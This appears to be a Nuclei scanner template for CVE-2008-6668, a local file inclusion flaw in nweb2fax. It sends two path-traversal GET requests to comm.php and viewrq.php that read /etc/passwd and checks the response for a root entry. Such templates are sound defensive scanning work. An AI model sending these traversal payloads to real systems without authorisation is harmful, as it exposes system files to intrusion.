47 lines
1.6 KiB
YAML
47 lines
1.6 KiB
YAML
id: CVE-2008-6668
|
|
|
|
info:
|
|
name: nweb2fax <=0.2.7 - Local File Inclusion
|
|
author: geeknik
|
|
severity: medium
|
|
description: nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted to viewrq.php.
|
|
remediation: |
|
|
Upgrade to a patched version of nweb2fax or apply the necessary security patches provided by the vendor.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/5856
|
|
- https://exchange.xforce.ibmcloud.com/vulnerabilities/43173
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2008-6668
|
|
- https://exchange.xforce.ibmcloud.com/vulnerabilities/43172
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
|
cvss-score: 5
|
|
cve-id: CVE-2008-6668
|
|
cwe-id: CWE-22
|
|
epss-score: 0.00359
|
|
epss-percentile: 0.69127
|
|
cpe: cpe:2.3:a:dirk_bartley:nweb2fax:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 2
|
|
vendor: dirk_bartley
|
|
product: nweb2fax
|
|
tags: cve2008,nweb2fax,lfi,traversal,edb,cve
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd"
|
|
- "{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4b0a00483046022100cecb2b83ba64a340db2a4ac6d0c00df89c933f3e82a4252922cdabd9675e43250221008da5e93240be0ae1fc994a8335100a573e0f9eab722241fbbd171b3e42147346:922c64590222798bb761d5b6d8e72950
|